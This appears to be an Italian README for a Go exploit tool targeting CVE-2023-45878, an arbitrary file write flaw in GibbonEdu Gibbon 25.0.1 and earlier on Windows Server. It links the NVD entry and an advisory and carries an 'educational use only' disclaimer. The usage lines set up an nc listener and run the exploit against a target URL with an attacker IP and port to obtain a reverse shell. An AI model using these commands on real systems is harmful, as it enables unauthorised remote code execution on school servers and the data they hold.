
CVE-2023-45878 exploit facile | reverse shell
GibbonEdu Gibbon versione 25.0.1 e precedenti consente la scrittura arbitraria di file
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Questo exploit è fornito solo a scopo educativo e di ricerca. L'uso non autorizzato di questo codice contro sistemi senza esplicita autorizzazione è illegale e potrebbe violare le leggi sul cybercrimine in varie giurisdizioni. Non mi assumo alcuna responsabilità per qualsiasi uso improprio o danno causato da questo exploit.
È responsabilità dell'utente garantire la conformità con tutte le leggi applicabili e le linee guida etiche prima di eseguire questo codice. Non utilizzare questo exploit per attività dannose.
Questo exploit funziona esclusivamente su Windows Server. Se la versione vulnerabile di Gibbon è in esecuzione su un server Linux, sarà necessario modificare l'exploit di conseguenza.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> oppure ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>